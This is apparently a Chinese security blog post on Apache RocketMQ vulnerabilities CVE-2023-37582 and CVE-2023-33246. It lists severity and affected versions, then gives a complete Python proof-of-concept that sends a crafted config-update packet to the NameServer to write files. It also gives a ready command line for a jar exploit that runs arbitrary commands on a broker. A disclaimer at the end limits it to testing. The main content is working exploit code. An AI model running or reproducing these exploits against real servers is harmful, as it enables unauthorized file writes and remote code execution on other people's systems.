本文结构

• CVE-2023-37582 漏洞评分
• CVE-2023-37582 影响范围
• CVE-2023-37582 漏洞POC
• CVE-2023-33246 更新Jar文件
• Refer

CVE-2023-37582 漏洞评分

危害程度: 高危

EXP情况: 已公开

攻击复杂度: 简单

权限要求: 无需权限

影响范围

影响版本： Apache RocketMQ NameServer 5.0.0 ～ 5.1.1 Apache RocketMQ NameServer 4.0.0 ～ 4.9.6

安全版本： Apache RocketMQ NameServer 5.1.2 Apache RocketMQ NameServer 4.9.7

CVE-2023-37582 漏洞POC

import socket
import binascii
# CVE-2023-37582
client = socket.socket()
# you ip
client.connect(('127.0.0.1',9876))
# data
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')

body='brokerConfigPath=/tmp/ziwu/CVE-2023-37582.txtnconfigStorePath=/tmp/ziwu/CVE-2023-37582.txtnaaaConfigPath=123\nMy name is DawnT0wn'.encode('utf-8')

json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)

head1 = '00000000'+str(hex(json_lens))[2:]

all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)

head2 = '00000000'+str(hex(all_lens))[2:]

data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')

# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)

CVE-2023-33246 更新Jar文件

在之前的文章提到使用Python的exp代码, 这里发现了相关的jar exp文件, 进行更新 Refer: https://github.com/Le1a/CVE-2023-33246 使用方法:

java -jar CVE-2023-33246.jar -ip "127.0.0.1:10911" -cmd "open -a Calculator"

备注: 由于心跳机制30s触发一次漏洞，所以工具延时35秒，保证命令被执行，随后再还原配置文件，所以该工具对漏洞进行利用的时候，并不会对环境产生影响！(前提是你需要等待工具自然结束，而不是强制关闭它！)

Refer

https://www.seebug.org/vuldb/ssvid-99722 https://github.com/Le1a/CVE-2023-33246 https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT https://avd.aliyun.com/detail?id=AVD-2023-37582 https://avd.aliyun.com/detail?id=AVD-2023-36884

声明

本文中的漏洞复现仅做测试之用，请不要在未授权的情况下将其用于非法目的，如有相关非法行为，与本人无关，请遵守《中华人民共和国网络安全法》。